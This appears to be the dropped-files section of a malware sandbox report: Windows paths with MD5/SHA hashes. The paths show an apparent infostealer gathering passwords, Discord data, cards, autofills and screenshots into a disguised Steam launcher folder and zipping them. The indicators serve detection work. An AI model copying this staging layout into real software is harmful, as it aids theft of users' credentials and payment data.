SHA512 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

C:\ProgramData\Steam\Launcher\EN-Spdohfma\Serial-Check.txt

MD5 1c3984c932fa850617b78b665cf8e9e2
SHA1 54f79dddbc6d24c65860b717a33194d96b7203b7
SHA256 4b69ed6f9252f03f188c90944b8106b444586a093d11a4546d694990b45fdc5d
SHA512 c0147ff34846de3c880f69d411c3f1c0ff7db1e642b8f6e1d132a00139f51d39af071b4ff14be27ee749bc87671ea4cca6c1b96638ace74c451e3a4f8417a19d

C:\ProgramData\Steam\Launcher\EN-Spdohfma\Passwords\Passwords.txt

MD5 c5e74f3120dbbd446a527e785dfe6d66
SHA1 11997c2a53d19fd20916e49411c7a61bfb590e9c
SHA256 e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05
SHA512 a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

C:\ProgramData\Steam\Launcher\EN-Spdohfma\Discord\discord.txt

MD5 675951f6d9d75fd2c9c06b5ff547c6fd
SHA1 9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09
SHA256 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244
SHA512 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

C:\ProgramData\Steam\Launcher\EN-Spdohfma\Cards\Cards.txt

MD5 8a0ed121ee275936bf62b33f840db290
SHA1 898770c85b05670ab1450a96ea6fbd46e6310ef6
SHA256 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709
SHA512 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

C:\ProgramData\Steam\Launcher\EN-Spdohfma\Autofills\Autofills.txt

MD5 2f308e49fe62fbc51aa7a9b987a630fe
SHA1 1b9277da78babd9c5e248b66ba6ab16c77b97d0b
SHA256 d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521
SHA512 c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

C:\ProgramData\Steam\Launcher\EN-Spdohfma\debug.log

MD5 72ee8eab4951050080bbcda14c57c0a0
SHA1 1119713f73e6f0a1514cb1fcfd4883da55fb7268
SHA256 141bb0c207e41f375d7d67fea097161dcbebfcad612054216b13887b523fca9d
SHA512 5af81800d9a72827023832cfedeaa18dc6fd8c369cc914872b953144fdab6d25bd968298b2c065155cde897902fd147d46b57e12e3d26c31c9ab9f8be4b03f9a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

MD5 c9266fb0b95181d7e6af76655c54e833
SHA1 dbd4dfbb5c95551fdeaa5b2173c516c783950a23
SHA256 86db581696383911c67d8cb30b22b30521028817b4bce21a12a2c351e42afb62
SHA512 d2651cd30dbc524a3f1846b0bf2b146d6e11b7aefcf03cbfebe6a818e249417646e19cf0b7ed804f3e0b2424500ecb0f310179262f16a92a56d9aea1e02bdb5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ca24df1817fa1aa670674846e5d41614
SHA1 dac66ea013bcc46d24f1ece855568187c6080eaf
SHA256 3b9d5525002b14e4b5c044e80d3035420d037b48d94a1f836c5a253df0c539db
SHA512 fb1848fa381fa360171ba13e1aa15c7029ff543c806f34ae524f04bda637b48e1aa06e831843aa830173c0a218072da7f3d0bc52ce56364b888c53234a224631

C:\ProgramData\Steam\Launcher\EN-Spdohfma.zip

MD5 930a2f210a12309c41589772bae08914
SHA1 8a81ef7286cf2d9eeb03907d859885e05a8ece47
SHA256 ccff633a967f5a9ae6c66ef569718f9983b385698d4f05d2290cc343e2303338
SHA512 6ecab3384bfa26fcdd4e66365a51a63a6981e4e601075ce0f04475a54ac41892518ce4c58b53f2396a9e180415bdc552f7f6d6c1b49a9870966ddefe3fff06b4

C:\ProgramData\Steam\Launcher\EN-Spdohfma\Screenshots\Screenshot.png

MD5 57b2f9ef5faeb3e64cb67fe92441a87e
SHA1 b7b73e59770110c202415273a4958acb12b6cdd7
SHA256 902cbe3c2100584f40d65b47fc73922333544af04d4cadcd826e079681b4ac40
SHA512 3f58cd7e2590dbc1c719450c8c8014dc87c6e3cf6b814dc1b062a80480761547fa16f5bd04675ca01fcf6737c7846e2617b9dee2d2308ae88abf1f311732535c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3ca1082427d7b2cd417d7c0b7fd95e4e
SHA1 b0482ff5b58ffff4f5242d77330b064190f269d3
SHA256 31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512 bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

C:\ProgramData\Steam\Launcher\EN-SPD~1\debug.log

MD5 f83850b89878ad82b35f7c37ef3055a0
SHA1 cbe1445eb4a6e01d5342292abb3e107a04459233
SHA256 581c12a2e96e4b74543b77773465549271c62b93b97cdf66cba78c41e485246f
SHA512 5cecc4a820427b40934b6cb212452d3fc21be17aefd51195d5c3fcfcccd869906a1756601526257a83ce4d1339430308f8c7abb5ef85e980c267d517272fb659

\??\pipe\crashpad_4512_YWGRJUUIBLLKYUSO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 9356dc179c6a74400dff957b512fd59a
SHA1 18b59ea90f441e88485a1c7e3e08123a254378e6
SHA256 657f14a357a62fd06d73b1586149a16d986a6de1dca32bcdb082aefb719f5885
SHA512 8c8e81db5f6e174a9a63a84353d78a2084cbc387907b9b7db4b1b0f1f0efdaa86ad723d9ac509db1629082d0dd0691b39b93dbc2bb0e4c91787603e6a05c0f56

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\26ed1aa8-7c85-4dfe-a4d6-b5ee35de56c2.tmp

MD5 01541add0f79f05b2adfd6cd7c0657f6
SHA1 9977cac8d851d2540774dae2a7f13a76e052d467
SHA256 17ad3352c83ae7f144fd46888b5cd558fa0e9b3e810767241e88f78ccb1592b4
SHA512 b7a6608cff2b2d5ee0e31a059cb46c9d4fac8496e2ca250fcca9eff9720f8a24b944ab1ddd23d2684e955f3cebf24881e622d0ebe22ea1c4a73bc584bfc0e49c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 16a7874e98547324dca19cc60833d135
SHA1 61847b078e4fc31f1813175c7bdd51f39a74c0c5
SHA256 6931378eeda1f7681a8dec7a960497e7a97075b492a39f96becf82f533a5d757
SHA512 a30c7fd42bf3499f143942bb9c1db79495e2a671dd150b388f056cf9d4726f4d42555ac7f80d6ff37a4cdbd6e3ab12465a7298c5d0399617ea228ae939ed13d3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 432c2ebf78f9cba3a84ff446bec9490a
SHA1 0296df892f2b8244221a929687ba7c2f2914ba34
SHA256 e2a6c880b0903f4a951d4859c1387df3c63ad66c5075e0b9058cd9d213377552
SHA512 d85de2cf9164a857ed0a84b4e765b6e1caf0c7dd8ec67d114b32cabe7dcbee66285752090b9f8b19986e279437df1663c61ef043c535bb6d8e5cdd0ccf9233ba

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f7f4a4a7523d256826e153bc2a98aefd
SHA1 a2b7539d31c4df7486ad41cba0b9111aed4dc068
SHA256 1cc4945c5b96e7b7ea341be8a8234366114f1185ad49b0515b9ba4800d9dbe75
SHA512 1f85548482bdad7eab9ece6536f1010ee1d3f25dda2744e63cd09f127714b63d77a07c9e8e1ddf775f9e04da6323d37282ac9d37737fd5fac33ab2c796aaccda

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

MD5 f998b8f6765b4c57936ada0bb2eb4a5a
SHA1 13fb29dc0968838653b8414a125c124023c001df
SHA256 374db366966d7b48782f352c78a0b3670ffec33ed046d931415034d6f93dcfef
SHA512 d340ae61467332f99e4606ef022ff71c9495b9d138a40cc7c58b3206be0d080b25f4e877a811a55f4320db9a7f52e39f88f1aa426ba79fc5e78fc73dacf8c716

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 082420e5c880b22f07f63775041f0a72
SHA1 6a6a9f3db0b856ebed9b65e880e98ab11b3f1dd7
SHA256 9eb33ea520fd15f44265481a4cd61fb3c0fb57a8c71794d2f16e88bb286a6f14
SHA512 1af406f9db5adad125505e46f7637ff74dce8f60f81cc8fb0e85660cf7205b0e4669bb3e1892ce65e1b98a1226a5a4de43977a1a6e5f2b7a2a551493d7f614e9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 7c1c9752e28861efa46d3984a50d5e46
SHA1 5c0e3949e26e3d36d4ba32c2994c9ca3056ce5e2
SHA256 c9b1ad6e07b49bfd0a1d7b7e5fe5f80bc2930666ba94e227337c5c9fe85dd674
SHA512 6e6eccf0c838523005a37adb938c3ed2b3b3c8af9eb54b113a46fe953a16a9b60f6cabab291b7de31167f123a815f810b5f82b2cf2375e7f582b347e86cbff51

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 2b1796b0db98b4b4da3a485ba900ab1c
SHA1 70a9cbc782f28b373c4d32ef11cd3338d927db4b
SHA256 def5556cc9b40e2f019f29bfa4d83404ba93e17c63b990ddbba19035e14af4f3
SHA512 7fd293cc8033901fe4cf87e59324044a6208546b4020ce4208597e43268bcc76f0636685f09128eb4be6ebe405b572ec9f939713b4fd2fcbd74d60424205ad21

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 b8457234fe5dfcc784997c16cd7d9f27
SHA1 771092f1ddc87564db1b7216ad2babfc01b779b5
SHA256 21a2822e2ee97e8d522c08c1db4cabb797a89c9d62b33155e2ff012943dc6719
SHA512 06247df586b56241a6662a063806186ff61b295c1a8916d9be95a4daf6cfc5b8994f5030d148168f4b0c27e8d9a03af3ad85a180f8eece99fb50f07df9cb91a4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 a8e03c8ebb0ecae5abf57b0286974adc
SHA1 48f9018ff2c69cd6d66e884449d3ac44d765ea4f
SHA256 949a702177da5d204a957cb16c1c9e553e1aba7eeaba035654abdbb396a22e7a
SHA512 9617ecded8137e49383529ddfa2a9f4b95b3292f5f3ca6f8de7ecc4c83574a1ac7663718810261da825be8d8bfd9a1bafc25fb3ed02baeeb2a947bd83847050d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 5b174cc35abf367ecb8495adda9dadfb
SHA1 46e1ad7e168b1c1cb4f0bd8bc6572af7aa951363
SHA256 a02bb1984ee80e907d7f61a54b48895b090a518471b9a767a3b7b44daa83c40a
SHA512 22e37d4ea5a00cca51f170e67fb4945f81f3f2cc9ef748a9d43f7f6e4bf82bb2d165aa8bb6d1f3dfa71d495ba2b53994e0c6e7163ea5f3bc46bbe82c087b3491

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 7d6c810684ccd21bad80b3adf89b5dad
SHA1 74c3b8893d98ebcdf11c9eae4298218d8b9fdacf
SHA256 12b17bd7ae9ae23515f5fd3b7317933e69db2497458b8ba66a79a296ebbec12d
SHA512 1be32cffad67dd89501773107d06f273e149151885d7ec63372771b46b110ea69698ee57aaa414adcd12012629d9ba1227984919f1ebb52d1db346a8a9bbcb0c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 baab4d13053a32226b26c0449e235898
SHA1 715c914da91bb83b56f508371fd42a2c7ca8723e
SHA256 d572395ffeb17fbed93adb8a3eb9bd7aed9627cd87c7b2b1f936e7cde23cfc8b
SHA512 b7c5dcbbe4ede3809a4c19cfa7bcd9798a70e333a86d006fd7df21e8ca7d37dbb13565a2f5fc5a24b42faeae2a1ed1a1a0194f75501668a941ddac24e1139683

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 edc0902a0da5d868bce61dd13e738def
SHA1 037635fbeb4bebfe0fec80345aa41f8107cb4032
SHA256 c0eb3d6f0ffb07e70ccf1e07eae462c269afa47d1df544a83190b78873abeaff
SHA512 a65157579d4586dd1d659532eb3396b9aff5ef50042daa8e7ad7fc79f745771cd0a475f322cc00aa0335d5b9c1187e33c9f6c559fdcaf1153e89cab095df2043

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 94275bde03760c160b707ba8806ef545
SHA1 aad8d87b0796de7baca00ab000b2b12a26427859
SHA256 c58cb79fa4a9ade48ed821dd9f98957b0adfda7c2d267e3d07951c2d371aa968
SHA512 2aabd49bc9f0ed3a5c690773f48a92dbbbd60264090a0db2fe0f166f8c20c767a74d1e1d7cc6a46c34cfbd1587ddb565e791d494cd0d2ca375ab8cc11cd8f930

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5c04ca.TMP

MD5 115fab6115f81a45e33d0b36d1981c9d
SHA1 4baaab1477f7d26ad2b78f00e5e8bed327401aa4
SHA256 969322a28dba44386c91cf637e31dd370b97d767c1cc62e223781bc219f0c0ae
SHA512 20dfc4e71678de9981b2f3695b3a7743c14cc6113b8df40d6e710ff6cd3ca5d8fc5f6d7d5a0353a1a888e989a3d9e9348a958ee38c5e1933b156e71b6d123f33